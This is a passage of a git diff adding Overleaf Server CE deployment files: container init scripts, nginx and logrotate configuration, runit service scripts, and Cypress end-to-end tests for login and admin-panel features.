skipping" + exit 0 +fi + +nginx_template_file="${nginx_templates_dir}/nginx.conf.template" +nginx_config_file="${nginx_dir}/nginx.conf" + +if [ -f "${nginx_template_file}" ]; then + export NGINX_KEEPALIVE_TIMEOUT="${NGINX_KEEPALIVE_TIMEOUT:-65}" + export NGINX_WORKER_CONNECTIONS="${NGINX_WORKER_CONNECTIONS:-768}" + export NGINX_WORKER_PROCESSES="${NGINX_WORKER_PROCESSES:-4}" + + echo "Nginx: generating config file from template" + + # Note the single-quotes, they are important. + # This is a pass-list of env-vars that envsubst + # should operate on. + # shellcheck disable=SC2016 + envsubst ' + ${NGINX_KEEPALIVE_TIMEOUT} + ${NGINX_WORKER_CONNECTIONS} + ${NGINX_WORKER_PROCESSES} + ' \ + < "${nginx_template_file}" \ + > "${nginx_config_file}" + + echo "Checking Nginx config" + nginx -t + + echo "Nginx: reloading config" + service nginx reload +fi diff --git a/server-ce/init_scripts/300_delete_old_logs.sh b/server-ce/init_scripts/300_delete_old_logs.sh new file mode 100755 index 0000000..dad919e --- /dev/null +++ b/server-ce/init_scripts/300_delete_old_logs.sh @@ -0,0 +1,7 @@ +#!/bin/sh +set -e + +# Up to version 2.5.0 the logs of the contacts service were written into a +# file that was not picked up by logrotate. +# The service is stable and we can safely discard any logs. +rm -vf /var/log/overleaf/contacts diff --git a/server-ce/init_scripts/500_check_db_access.sh b/server-ce/init_scripts/500_check_db_access.sh new file mode 100755 index 0000000..bbf2b9e --- /dev/null +++ b/server-ce/init_scripts/500_check_db_access.sh @@ -0,0 +1,8 @@ +#!/bin/sh +set -e + +echo "Checking can connect to mongo and redis" +cd /overleaf/services/web +node modules/server-ce-scripts/scripts/check-mongodb.mjs +node modules/server-ce-scripts/scripts/check-redis.mjs +echo "All checks passed" diff --git a/server-ce/init_scripts/900_run_web_migrations.sh b/server-ce/init_scripts/900_run_web_migrations.sh new file mode 100755 index 0000000..59b7d23 --- /dev/null +++ b/server-ce/init_scripts/900_run_web_migrations.sh @@ -0,0 +1,13 @@ +#!/usr/bin/env bash +set -euo pipefail + +if [[ "${OVERLEAF_IS_SERVER_PRO:-null}" == "true" ]]; then + environment="server-pro" +else + environment="server-ce" +fi + +echo "Running migrations for $environment" +cd /overleaf/services/web +npm run migrations -- migrate -t "$environment" +echo "Finished migrations" diff --git a/server-ce/init_scripts/910_check_texlive_images b/server-ce/init_scripts/910_check_texlive_images new file mode 100755 index 0000000..90dec00 --- /dev/null +++ b/server-ce/init_scripts/910_check_texlive_images @@ -0,0 +1,6 @@ +#!/bin/sh +set -e + +echo "Checking texlive images" +cd /overleaf/services/web +node modules/server-ce-scripts/scripts/check-texlive-images.mjs diff --git a/server-ce/init_scripts/910_initiate_doc_version_recovery b/server-ce/init_scripts/910_initiate_doc_version_recovery new file mode 100755 index 0000000..1daecd3 --- /dev/null +++ b/server-ce/init_scripts/910_initiate_doc_version_recovery @@ -0,0 +1,50 @@ +#!/bin/bash + +set -euo pipefail + +source /etc/container_environment.sh +source /etc/overleaf/env.sh + +LOG_FILE=/var/lib/overleaf/data/history/doc-version-recovery.log +RESYNCS_NEEDED_FILE=/var/lib/overleaf/data/history/doc-version-recovery-resyncs-5.0.3.log + +echo "Checking for doc version recovery. This can take a while if needed. Logs are in $LOG_FILE" +cd /overleaf/services/history-v1 +LOG_LEVEL=info DOC_VERSION_RECOVERY_RESYNCS_NEEDED_FILE="$RESYNCS_NEEDED_FILE" node storage/scripts/recover_doc_versions.js 2>&1 | tee -a "$LOG_FILE" + +function resyncAllProjectsInBackground() { + waitForService docstore 3016 + waitForService document-updater 3003 + waitForService filestore 3009 + waitForService history-v1 3100 + waitForService project-history 3054 + waitForService web-api 4000 + + # Resync files that had their versions updated + while read -r project_id; do + echo "Resyncing project $project_id..." + curl -X POST --silent "http://127.0.0.1:3054/project/$project_id/resync?force=true" + done < "$RESYNCS_NEEDED_FILE" + + # Resync files that have broken histories + /overleaf/bin/force-history-resyncs + + echo "Finished resyncing history for all projects. Adding .done suffix to log file" + mv "$RESYNCS_NEEDED_FILE" "$RESYNCS_NEEDED_FILE.done" +} + +function waitForService() { + local name=$1 + local port=$2 + while ! curl --fail --silent "http://127.0.0.1:$port/status"; do + echo "Waiting for $name service to start up" + sleep 10 + done +} + +if [ -f "$RESYNCS_NEEDED_FILE" ]; then + echo "Finished recovery of doc versions. Resyncing history for all projects in the background." + resyncAllProjectsInBackground & +else + echo "No recovery of doc versions needed." +fi diff --git a/server-ce/logrotate/overleaf b/server-ce/logrotate/overleaf new file mode 100644 index 0000000..6c6f8d7 --- /dev/null +++ b/server-ce/logrotate/overleaf @@ -0,0 +1,9 @@ +/var/log/overleaf/*.log { + daily + missingok + rotate 5 + compress + copytruncate + notifempty + create 644 root adm +} diff --git a/server-ce/nginx/clsi-nginx.conf b/server-ce/nginx/clsi-nginx.conf new file mode 100644 index 0000000..aac976e --- /dev/null +++ b/server-ce/nginx/clsi-nginx.conf @@ -0,0 +1,61 @@ +# keep in sync with clsi-startup.sh files +# keep in sync with clsi/nginx.conf +# Changes to the above: +# - added debug header +# - remove CORS rules, Server-CE/Server-Pro runs behind a single origin +# - change /output path to /var/lib/overleaf/data/output + +server { + # Extra header for debugging. + add_header 'X-Served-By' 'clsi-nginx' always; + + # Security-Headers + add_header 'X-Content-Type-Options' 'nosniff' always; + add_header 'X-Download-Options' 'noopen' always; + add_header 'X-Frame-Options' 'SAMEORIGIN' always; + add_header 'X-XSS-Protection' '1; mode=block' always; + + listen 8080; + server_name clsi-nginx; + server_tokens off; + access_log off; + # Ignore symlinks possibly created by users + disable_symlinks on; + # enable compression for tex auxiliary files, but not for pdf files + gzip on; + gzip_types text/plain; + gzip_proxied any; + types { + text/plain log blg aux stdout stderr; + application/pdf pdf; + } + # handle output files for specific users + location ~ ^/project/([0-9a-f]+)/user/([0-9a-f]+)/build/([0-9a-f-]+)/output/output\.([a-z.]+)$ { + alias /var/lib/overleaf/data/output/$1-$2/generated-files/$3/output.$4; + } + # handle .blg files for specific users + location ~ ^/project/([0-9a-f]+)/user/([0-9a-f]+)/build/([0-9a-f-]+)/output/(.+)\.blg$ { + alias /var/lib/overleaf/data/output/$1-$2/generated-files/$3/$4.blg; + } + # handle output files for anonymous users + location ~ ^/project/([0-9a-f]+)/build/([0-9a-f-]+)/output/output\.([a-z.]+)$ { + alias /var/lib/overleaf/data/output/$1/generated-files/$2/output.$3; + } + # handle .blg files for anonymous users + location ~ ^/project/([0-9a-f]+)/build/([0-9a-f-]+)/output/(.+)\.blg$ { + alias /var/lib/overleaf/data/output/$1/generated-files/$2/$3.blg; + } + + # PDF range for specific users + location ~ ^/project/([0-9a-f]+)/user/([0-9a-f]+)/content/([0-9a-f-]+/[0-9a-f]+)$ { + # Cache for one day + expires 1d; + alias /var/lib/overleaf/data/output/$1-$2/content/$3; + } + # PDF range for anonymous users + location ~ ^/project/([0-9a-f]+)/content/([0-9a-f-]+/[0-9a-f]+)$ { + # Cache for one day + expires 1d; + alias /var/lib/overleaf/data/output/$1/content/$2; + } +} diff --git a/server-ce/nginx/nginx.conf.template b/server-ce/nginx/nginx.conf.template new file mode 100644 index 0000000..639937f --- /dev/null +++ b/server-ce/nginx/nginx.conf.template @@ -0,0 +1,81 @@ +## ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ## +## ! This file was generated from a template ! ## +## ! See /etc/nginx/templates/ ! ## +## ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ## +daemon off; +user www-data; +worker_processes ${NGINX_WORKER_PROCESSES}; +pid /run/nginx.pid; + +events { + worker_connections ${NGINX_WORKER_CONNECTIONS}; + # multi_accept on; +} + +http { + + ## + # Basic Settings + ## + + sendfile on; + tcp_nopush on; + tcp_nodelay on; + keepalive_timeout ${NGINX_KEEPALIVE_TIMEOUT}; + types_hash_max_size 2048; + # server_tokens off; + + # server_names_hash_bucket_size 64; + # server_name_in_redirect off; + + include /etc/nginx/mime.types; + default_type application/octet-stream; + + ## + # Logging Settings + ## + + access_log /var/log/nginx/access.log; + error_log /var/log/nginx/error.log; + + ## + # Gzip Settings + ## + + gzip on; + gzip_disable "msie6"; + gzip_proxied any; # allow upstream server to compress. + + client_max_body_size 50m; + + # gzip_vary on; + # gzip_proxied any; + # gzip_comp_level 6; + # gzip_buffers 16 8k; + # gzip_http_version 1.1; + # gzip_types text/plain text/css application/json application/x-javascript text/xml application/xml application/xml+rss text/javascript; + + ## + # nginx-naxsi config + ## + # Uncomment it if you installed nginx-naxsi + ## + + #include /etc/nginx/naxsi_core.rules; + + ## + # nginx-passenger config + ## + # Uncomment it if you installed nginx-passenger + ## + + #passenger_root /usr; + #passenger_ruby /usr/bin/ruby; + + ## + # Virtual Host Configs + ## + + include /etc/nginx/conf.d/*.conf; + include /etc/nginx/sites-enabled/*; +} diff --git a/server-ce/nginx/overleaf.conf b/server-ce/nginx/overleaf.conf new file mode 100644 index 0000000..77e59df --- /dev/null +++ b/server-ce/nginx/overleaf.conf @@ -0,0 +1,82 @@ +server { + listen 80; + server_name _; # Catch all, see http://nginx.org/en/docs/http/server_names.html + + root /overleaf/services/web/public/; + + # block external access to prometheus /metrics + location /metrics { + internal; + } + + location / { + proxy_pass http://127.0.0.1:4000; + proxy_http_version 1.1; + proxy_set_header Upgrade $http_upgrade; + proxy_set_header Connection "upgrade"; + proxy_set_header Host $host; + proxy_set_header X-Forwarded-Host $host; + proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; + proxy_read_timeout 10m; + proxy_send_timeout 10m; + } + + location /socket.io { + proxy_pass http://127.0.0.1:3026; + proxy_http_version 1.1; + proxy_set_header Upgrade $http_upgrade; + proxy_set_header Connection "upgrade"; + proxy_set_header Host $host; + proxy_set_header X-Forwarded-Host $host; + proxy_set_header X-Forwarded-Proto $scheme; + proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; + proxy_read_timeout 10m; + proxy_send_timeout 10m; + } + + location /stylesheets { + expires 1y; + } + + location /minjs { + expires 1y; + } + + location /img { + expires 1y; + } + + # handle output files for specific users + location ~ ^/project/([0-9a-f]+)/user/([0-9a-f]+)/build/([0-9a-f-]+)/output/output\.([a-z.]+)$ { + proxy_pass http://127.0.0.1:8080; # clsi-nginx.conf + proxy_http_version 1.1; + } + # handle output files for anonymous users + location ~ ^/project/([0-9a-f]+)/build/([0-9a-f-]+)/output/output\.([a-z.]+)$ { + proxy_pass http://127.0.0.1:8080; # clsi-nginx.conf + proxy_http_version 1.1; + } + # PDF range for specific users + location ~ ^/project/([0-9a-f]+)/user/([0-9a-f]+)/content/([0-9a-f-]+/[0-9a-f]+)$ { + proxy_pass http://127.0.0.1:8080; # clsi-nginx.conf + proxy_http_version 1.1; + } + # PDF range for anonymous users + location ~ ^/project/([0-9a-f]+)/content/([0-9a-f-]+/[0-9a-f]+)$ { + proxy_pass http://127.0.0.1:8080; # clsi-nginx.conf + proxy_http_version 1.1; + } + + # block external access to metrics + location ~* ^/metrics/?$ { + return 404 'Not found'; + } + + # block external access to all health checks /health_check, /health_check/full, etc + location ~* ^/health_check { + return 404 'Not found'; + } + + # Load any extra configuration for this vhost + include /etc/nginx/vhost-extras/overleaf/*.conf; +} diff --git a/server-ce/runit/chat-overleaf/run b/server-ce/runit/chat-overleaf/run new file mode 100755 index 0000000..ea91753 --- /dev/null +++ b/server-ce/runit/chat-overleaf/run @@ -0,0 +1,12 @@ +#!/bin/bash + +NODE_PARAMS="" +if [ "$DEBUG_NODE" == "true" ]; then + echo "running debug - chat" + NODE_PARAMS="--inspect=0.0.0.0:30100" +fi + +source /etc/overleaf/env.sh +export LISTEN_ADDRESS=127.0.0.1 + +exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/chat/app.js >> /var/log/overleaf/chat.log 2>&1 diff --git a/server-ce/runit/clsi-overleaf/run b/server-ce/runit/clsi-overleaf/run new file mode 100755 index 0000000..ece2031 --- /dev/null +++ b/server-ce/runit/clsi-overleaf/run @@ -0,0 +1,21 @@ +#!/bin/bash + +NODE_PARAMS="" +if [ "$DEBUG_NODE" == "true" ]; then + echo "running debug - clsi" + NODE_PARAMS="--inspect=0.0.0.0:30130" +fi + +# Set permissions on docker.sock if present, +# To enable sibling-containers (see entrypoint.sh in clsi project) +if [ -e '/var/run/docker.sock' ]; then + echo ">> Setting permissions on docker socket" + DOCKER_GROUP=$(stat -c '%g' /var/run/docker.sock) + groupadd --non-unique --gid "${DOCKER_GROUP}" dockeronhost + usermod -aG dockeronhost www-data +fi + +source /etc/overleaf/env.sh +export LISTEN_ADDRESS=127.0.0.1 + +exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/clsi/app.js >> /var/log/overleaf/clsi.log 2>&1 diff --git a/server-ce/runit/contacts-overleaf/run b/server-ce/runit/contacts-overleaf/run new file mode 100755 index 0000000..8844f66 --- /dev/null +++ b/server-ce/runit/contacts-overleaf/run @@ -0,0 +1,12 @@ +#!/bin/bash + +NODE_PARAMS="" +if [ "$DEBUG_NODE" == "true" ]; then + echo "running debug - contacts" + NODE_PARAMS="--inspect=0.0.0.0:30360" +fi + +source /etc/overleaf/env.sh +export LISTEN_ADDRESS=127.0.0.1 + +exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/contacts/app.js >> /var/log/overleaf/contacts.log 2>&1 diff --git a/server-ce/runit/docstore-overleaf/run b/server-ce/runit/docstore-overleaf/run new file mode 100755 index 0000000..b8166d1 --- /dev/null +++ b/server-ce/runit/docstore-overleaf/run @@ -0,0 +1,12 @@ +#!/bin/bash + +NODE_PARAMS="" +if [ "$DEBUG_NODE" == "true" ]; then + echo "running debug - docstore" + NODE_PARAMS="--inspect=0.0.0.0:30160" +fi + +source /etc/overleaf/env.sh +export LISTEN_ADDRESS=127.0.0.1 + +exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/docstore/app.js >> /var/log/overleaf/docstore.log 2>&1 diff --git a/server-ce/runit/document-updater-overleaf/run b/server-ce/runit/document-updater-overleaf/run new file mode 100755 index 0000000..0cd485b --- /dev/null +++ b/server-ce/runit/document-updater-overleaf/run @@ -0,0 +1,12 @@ +#!/bin/bash + +NODE_PARAMS="" +if [ "$DEBUG_NODE" == "true" ]; then + echo "running debug - document updater" + NODE_PARAMS="--inspect=0.0.0.0:30030" +fi + +source /etc/overleaf/env.sh +export LISTEN_ADDRESS=127.0.0.1 + +exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/document-updater/app.js >> /var/log/overleaf/document-updater.log 2>&1 diff --git a/server-ce/runit/filestore-overleaf/run b/server-ce/runit/filestore-overleaf/run new file mode 100755 index 0000000..66329e9 --- /dev/null +++ b/server-ce/runit/filestore-overleaf/run @@ -0,0 +1,6 @@ +#!/bin/bash + +source /etc/overleaf/env.sh +export LISTEN_ADDRESS=127.0.0.1 + +exec /sbin/setuser www-data /usr/bin/node /overleaf/services/filestore/app.js >> /var/log/overleaf/filestore.log 2>&1 diff --git a/server-ce/runit/history-v1-overleaf/run b/server-ce/runit/history-v1-overleaf/run new file mode 100755 index 0000000..15979fa --- /dev/null +++ b/server-ce/runit/history-v1-overleaf/run @@ -0,0 +1,9 @@ +#!/bin/bash + +NODE_PARAMS="" +if [ "$DEBUG_NODE" == "true" ]; then + echo "running debug - history-v1" + NODE_PARAMS="--inspect=0.0.0.0:30640" +fi + +NODE_CONFIG_DIR=/overleaf/services/history-v1/config exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/history-v1/app.js >> /var/log/overleaf/history-v1.log 2>&1 diff --git a/server-ce/runit/nginx/run b/server-ce/runit/nginx/run new file mode 100755 index 0000000..9eacfb4 --- /dev/null +++ b/server-ce/runit/nginx/run @@ -0,0 +1,2 @@ +#!/bin/bash +exec nginx \ No newline at end of file diff --git a/server-ce/runit/notifications-overleaf/run b/server-ce/runit/notifications-overleaf/run new file mode 100755 index 0000000..1d0f2c8 --- /dev/null +++ b/server-ce/runit/notifications-overleaf/run @@ -0,0 +1,12 @@ +#!/bin/bash + +NODE_PARAMS="" +if [ "$DEBUG_NODE" == "true" ]; then + echo "running debug - notifications" + NODE_PARAMS="--inspect=0.0.0.0:30420" +fi + +source /etc/overleaf/env.sh +export LISTEN_ADDRESS=127.0.0.1 + +exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/notifications/app.js >> /var/log/overleaf/notifications.log 2>&1 diff --git a/server-ce/runit/project-history-overleaf/run b/server-ce/runit/project-history-overleaf/run new file mode 100755 index 0000000..fe1a6bd --- /dev/null +++ b/server-ce/runit/project-history-overleaf/run @@ -0,0 +1,12 @@ +#!/bin/bash + +NODE_PARAMS="" +if [ "$DEBUG_NODE" == "true" ]; then + echo "running debug - project-history" + NODE_PARAMS="--inspect=0.0.0.0:30540" +fi + +source /etc/overleaf/env.sh +export LISTEN_ADDRESS=127.0.0.1 + +exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/project-history/app.js >> /var/log/overleaf/project-history.log 2>&1 diff --git a/server-ce/runit/real-time-overleaf/run b/server-ce/runit/real-time-overleaf/run new file mode 100755 index 0000000..8081dd7 --- /dev/null +++ b/server-ce/runit/real-time-overleaf/run @@ -0,0 +1,6 @@ +#!/bin/bash + +source /etc/overleaf/env.sh +export LISTEN_ADDRESS=127.0.0.1 + +exec /sbin/setuser www-data /usr/bin/node /overleaf/services/real-time/app.js >> /var/log/overleaf/real-time.log 2>&1 diff --git a/server-ce/runit/web-api-overleaf/run b/server-ce/runit/web-api-overleaf/run new file mode 100755 index 0000000..9aafc53 --- /dev/null +++ b/server-ce/runit/web-api-overleaf/run @@ -0,0 +1,14 @@ +#!/bin/bash + +NODE_PARAMS="" +if [ "$DEBUG_NODE" == "true" ]; then + echo "running debug - web-api" + NODE_PARAMS="--inspect=0.0.0.0:30000" +fi + +source /etc/overleaf/env.sh +export LISTEN_ADDRESS=0.0.0.0 +export ENABLED_SERVICES="api" +export METRICS_APP_NAME="web-api" + +exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/web/app.mjs >> /var/log/overleaf/web-api.log 2>&1 diff --git a/server-ce/runit/web-overleaf/run b/server-ce/runit/web-overleaf/run new file mode 100755 index 0000000..438328a --- /dev/null +++ b/server-ce/runit/web-overleaf/run @@ -0,0 +1,14 @@ +#!/bin/bash + +NODE_PARAMS="" +if [ "$DEBUG_NODE" == "true" ]; then + echo "running debug - web" + NODE_PARAMS="--inspect=0.0.0.0:40000" +fi + +source /etc/overleaf/env.sh +export LISTEN_ADDRESS=127.0.0.1 +export ENABLED_SERVICES="web" +export WEB_PORT="4000" + +exec /sbin/setuser www-data /usr/bin/node $NODE_PARAMS /overleaf/services/web/app.mjs >> /var/log/overleaf/web.log 2>&1 diff --git a/server-ce/services.js b/server-ce/services.js new file mode 100644 index 0000000..d0b0a9c --- /dev/null +++ b/server-ce/services.js @@ -0,0 +1,41 @@ +module.exports = [ + { + name: 'web', + }, + { + name: 'real-time', + }, + { + name: 'document-updater', + }, + { + name: 'clsi', + }, + { + name: 'filestore', + }, + { + name: 'docstore', + }, + { + name: 'chat', + }, + { + name: 'contacts', + }, + { + name: 'notifications', + }, + { + name: 'project-history', + }, + { + name: 'history-v1', + }, +] + +if (require.main === module) { + for (const service of module.exports) { + console.log(service.name) + } +} diff --git a/server-ce/test/.gitignore b/server-ce/test/.gitignore new file mode 100644 index 0000000..56be476 --- /dev/null +++ b/server-ce/test/.gitignore @@ -0,0 +1,2 @@ +data/ +docker-mailtrap/ diff --git a/server-ce/test/Dockerfile b/server-ce/test/Dockerfile new file mode 100644 index 0000000..721b99c --- /dev/null +++ b/server-ce/test/Dockerfile @@ -0,0 +1,8 @@ +FROM node:20.18.2 +RUN curl -fsSL https://download.docker.com/linux/debian/gpg | apt-key add - \ +&& echo \ + "deb [arch=$(dpkg --print-architecture)] https://download.docker.com/linux/debian $(. /etc/os-release && echo "$VERSION_CODENAME") stable" \ + > /etc/apt/sources.list.d/docker.list \ +&& apt-get update \ +&& apt-get install -y docker-ce-cli docker-compose-plugin \ +&& rm -rf /var/lib/apt/lists/* diff --git a/server-ce/test/Makefile b/server-ce/test/Makefile new file mode 100644 index 0000000..18f4446 --- /dev/null +++ b/server-ce/test/Makefile @@ -0,0 +1,63 @@ +all: test-e2e + +# We are updating the docker compose config via the host-admin service. +# The host-admin service is running inside docker and has its own file-system layout. +# We need to have both file-system layouts agree on the path for the docker compose project. +# Notable the container labels com.docker.compose.project.working_dir and com.docker.compose.project.config_files need to match when creating containers from the docker host (how you started things) and from host-admin (how tests reconfigure the instance). +export PWD = $(shell pwd) + +export TEX_LIVE_DOCKER_IMAGE ?= gcr.io/overleaf-ops/texlive-full:2023.1 +export ALL_TEX_LIVE_DOCKER_IMAGES ?= gcr.io/overleaf-ops/texlive-full:2023.1,gcr.io/overleaf-ops/texlive-full:2022.1 +export IMAGE_TAG_PRO ?= us-east1-docker.pkg.dev/overleaf-ops/ol-docker/pro:latest +export CYPRESS_SHARD ?= +export COMPOSE_PROJECT_NAME ?= test + +test-e2e-native: + docker compose -f docker-compose.yml -f docker-compose.native.yml up --no-log-prefix sharelatex host-admin -d + CYPRESS_HOST_ADMIN_URL='http://localhost:8081' \ + CYPRESS_SAML_URL='http://localhost:8082' \ + CYPRESS_MAILTRAP_URL='http://localhost:8083' \ + npm run cypress:open + +test-e2e: + docker compose up --no-log-prefix --exit-code-from=e2e e2e + +test-e2e-open: + docker compose up --no-log-prefix --exit-code-from=e2e-open e2e-open + +clean: + docker compose down --volumes --timeout 0 + +prefetch: prefetch_default +prefetch_default: prefetch_default_compose +prefetch_default_compose: + docker compose pull e2e mongo redis + +prefetch_default: prefetch_default_compose_build +prefetch_default_compose_build: + docker compose build host-admin + +prefetch: prefetch_custom +prefetch_custom: prefetch_custom_compose_pull +prefetch_custom_compose_pull: + docker compose pull saml ldap + +prefetch_custom: prefetch_custom_texlive +prefetch_custom_texlive: + echo "$$ALL_TEX_LIVE_DOCKER_IMAGES" | tr ',' '\n' | xargs -I% \ + sh -exc 'tag=%; re_tag=quay.io/sharelatex/$${tag#*/*/}; docker pull $$tag; docker tag $$tag $$re_tag' + +prefetch_custom: prefetch_old +prefetch_old: + docker pull $(IMAGE_TAG_PRO:latest=4.2) + docker pull $(IMAGE_TAG_PRO:latest=5.0.1-RC1) + docker pull $(IMAGE_TAG_PRO:latest=5.0) + +# Google Cloud Build runs on a very ancient Docker version that does not support the subdir flag. +# Use services -> mailtrap -> build -> context = https://github.com/dbck/docker-mailtrap.git#v1.5.0:build in docker-compose.yml eventually. +prefetch_default_compose_build: build_mailtrap +build_mailtrap: + git clone https://github.com/dbck/docker-mailtrap.git || true && cd docker-mailtrap && git checkout v1.5.0 + docker build -t mailtrap docker-mailtrap/build + +.PHONY: test-e2e test-e2e-open diff --git a/server-ce/test/accounts.spec.ts b/server-ce/test/accounts.spec.ts new file mode 100644 index 0000000..eeeb104 --- /dev/null +++ b/server-ce/test/accounts.spec.ts @@ -0,0 +1,38 @@ +import { createMongoUser, ensureUserExists, login } from './helpers/login' +import { isExcludedBySharding, startWith } from './helpers/config' + +describe('Accounts', function () { + if (isExcludedBySharding('CE_DEFAULT')) return + startWith({}) + ensureUserExists({ email: 'user@example.com' }) + + it('can log in and out', function () { + login('user@example.com') + cy.visit('/project') + cy.findByText('Account').click() + cy.findByText('Log Out').click() + cy.url().should('include', '/login') + cy.visit('/project') + cy.url().should('include', '/login') + }) + + it('should render the email on the user activate screen', () => { + const email = 'not-activated-user@example.com' + cy.then(async () => { + const { url } = await createMongoUser({ email }) + return url + }).as('url') + cy.get('@url').then(url => { + cy.visit(`${url}`) + cy.url().should('contain', '/user/activate') + cy.findByText('Please set a password') + cy.get('input[autocomplete="username"]').should( + 'have.attr', + 'value', + email + ) + cy.get('input[name="password"]') + cy.findByRole('button', { name: 'Activate' }) + }) + }) +}) diff --git a/server-ce/test/admin.spec.ts b/server-ce/test/admin.spec.ts new file mode 100644 index 0000000..18b33c6 --- /dev/null +++ b/server-ce/test/admin.spec.ts @@ -0,0 +1,327 @@ +import { isExcludedBySharding, startWith } from './helpers/config' +import { + activateUser, + createMongoUser, + ensureUserExists, + login, +} from './helpers/login' +import { v4 as uuid } from 'uuid' +import { createProject } from './helpers/project' +import { beforeWithReRunOnTestRetry } from './helpers/beforeWithReRunOnTestRetry' +import { openEmail } from './helpers/email' + +describe('admin panel', function () { + function registrationTests() { + it('via GUI and opening URL manually', () => { + const user = `${uuid()}@example.com` + cy.get('input[name="email"]').type(user + '{enter}') + + cy.get('td') + .contains(/\/user\/activate/) + .then($td => { + const url = $td.text().trim() + activateUser(url) + }) + }) + + it('via GUI and email', () => { + const user = `${uuid()}@example.com` + cy.get('input[name="email"]').type(user + '{enter}') + + let url: string + cy.get('td') + .contains(/\/user\/activate/) + .then($td => { + url = $td.text().trim() + }) + + cy.then(() => { + openEmail( + 'Activate your Overleaf Community Edition Account', + (frame, { url }) => { + frame.contains('Set password').then(el => { + expect(el.attr('href')!).to.equal(url) + }) + }, + { url } + ) + // Run activateUser in the main origin instead of inside openEmail. See docs on openEmail. + activateUser(url) + }) + }) + it('via script and opening URL manually', () => { + const user = `${uuid()}@example.com` + let url: string + cy.then(async () => { + ;({ url } = await createMongoUser({ email: user })) + }) + cy.then(() => { + activateUser(url) + }) + }) + it('via script and email', () => { + const user = `${uuid()}@example.com` + let url: string + cy.then(async () => { + ;({ url } = await createMongoUser({ email: user })) + }) + cy.then(() => { + openEmail( + 'Activate your Overleaf Community Edition Account', + (frame, { url }) => { + frame.contains('Set password').then(el => { + expect(el.attr('href')!).to.equal(url) + }) + }, + { url } + ) + // Run activateUser in the main origin instead of inside openEmail. See docs on openEmail. + activateUser(url) + }) + }) + } + + describe('in CE', () => { + if (isExcludedBySharding('CE_DEFAULT')) return + startWith({ pro: false, version: 'latest' }) + const admin = 'admin@example.com' + const user = `user+${uuid()}@example.com` + ensureUserExists({ email: admin, isAdmin: true }) + ensureUserExists({ email: user }) + + describe('create users', () => { + beforeEach(() => { + login(admin) + cy.visit('/project') + cy.get('nav').findByText('Admin').click() + cy.get('nav').findByText('Manage Users').click() + }) + registrationTests() + }) + }) + + describe('in server pro', () => { + const admin = 'admin@example.com' + const user1 = 'user@example.com' + const user2 = 'user2@example.com' + + let testProjectName = '' + let testProjectId = '' + let deletedProjectName = '' + let projectToDeleteId = '' + + const findProjectRow = (projectName: string) => { + cy.log('find project row') + return cy.findByText(projectName).parent().parent() + } + + if (isExcludedBySharding('PRO_DEFAULT_2')) return + startWith({ + pro: true, + }) + ensureUserExists({ email: admin, isAdmin: true }) + ensureUserExists({ email: user1 }) + ensureUserExists({ email: user2 }) + + beforeWithReRunOnTestRetry(() => { + testProjectName = `project-${uuid()}` + deletedProjectName = `deleted-project-${uuid()}` + login(user1) + createProject(testProjectName, { open: false }).then( + id => (testProjectId = id) + ) + createProject(deletedProjectName, { open: false }).then( + id => (projectToDeleteId = id) + ) + }) + + describe('manage site', () => { + beforeEach(() => { + login(admin) + cy.visit('/project') + cy.get('nav').findByText('Admin').click() + cy.get('nav').findByText('Manage Site').click() + }) + + it('publish and clear admin messages', () => { + const message = 'Admin Message ' + uuid() + + cy.log('create system message') + cy.get('[role="tab"]').contains('System Messages').click() + cy.get('input[name="content"]').type(message) + cy.get('button').contains('Post Message').click() + cy.findByText(message) + + login(user1) + cy.visit('/project') + cy.findByText(message) + + cy.log('clear system messages') + login(admin) + cy.visit('/project') + cy.get('nav').findByText('Admin').click() + cy.get('nav').findByText('Manage Site').click() + cy.get('[role="tab"]').contains('System Messages').click() + cy.get('button').contains('Clear all messages').click() + + cy.log('verify system messages are no longer displayed') + login(user1) + cy.visit('/project') + cy.findByText(message).should('not.exist') + }) + }) + + describe('manage users', () => { + beforeEach(() => { + login(admin) + cy.visit('/project') + cy.get('nav').findByText('Admin').click() + cy.get('nav').findByText('Manage Users').click() + }) + + describe('create users', () => { + beforeEach(() => { + cy.get('a').contains('New User').click() + }) + registrationTests() + }) + + it('user list RegExp search', () => { + cy.get('input[name="isRegExpSearch"]').click() + cy.get('input[name="email"]').type('user[0-9]{enter}') + cy.findByText(user2) + cy.findByText(user1).should('not.exist') + }) + }) + + describe('user page', () => { + beforeEach(() => { + login(admin) + cy.visit('/project') + cy.get('nav').findByText('Admin').click() + cy.get('nav').findByText('Manage Users').click() + cy.get('input[name="email"]').type(user1 + '{enter}') + cy.findByText(user1).click() + cy.url().should('match', /\/admin\/user\/[a-fA-F0-9]{24}/) + }) + + it('displays expected tabs', () => { + const tabs = [ + 'User Info', + 'Projects', + 'Deleted Projects', + 'Audit Log', + 'Sessions', + ] + cy.get('[role="tab"]').each((el, index) => { + cy.wrap(el).findByText(tabs[index]).click() + }) + cy.get('[role="tab"]').should('have.length', tabs.length) + }) + + describe('user info tab', () => { + beforeEach(() => { + cy.get('[role="tab"]').contains('User Info').click() + }) + + it('displays required sections', () => { + // not exhaustive list, checks the tab content is rendered + cy.findByText('Profile') + cy.findByText('Editor Settings') + }) + + it('should not display SaaS-only sections', () => { + cy.findByText('Referred User Count').should('not.exist') + cy.findByText('Split Test Assignments').should('not.exist') + cy.findByText('Experimental Features').should('not.exist') + cy.findByText('Service Integration').should('not.exist') + cy.findByText('SSO Integrations').should('not.exist') + cy.findByText('Security').should('not.exist') + }) + }) + + it('transfer project ownership', () => { + cy.log("access project admin through owners' project list") + cy.get('[role="tab"]').contains('Projects').click() + cy.get(`a[href="/admin/project/${testProjectId}"]`).click() + + cy.findByText('Transfer Ownership').click() + cy.get('button[type="submit"]').should('be.disabled') + 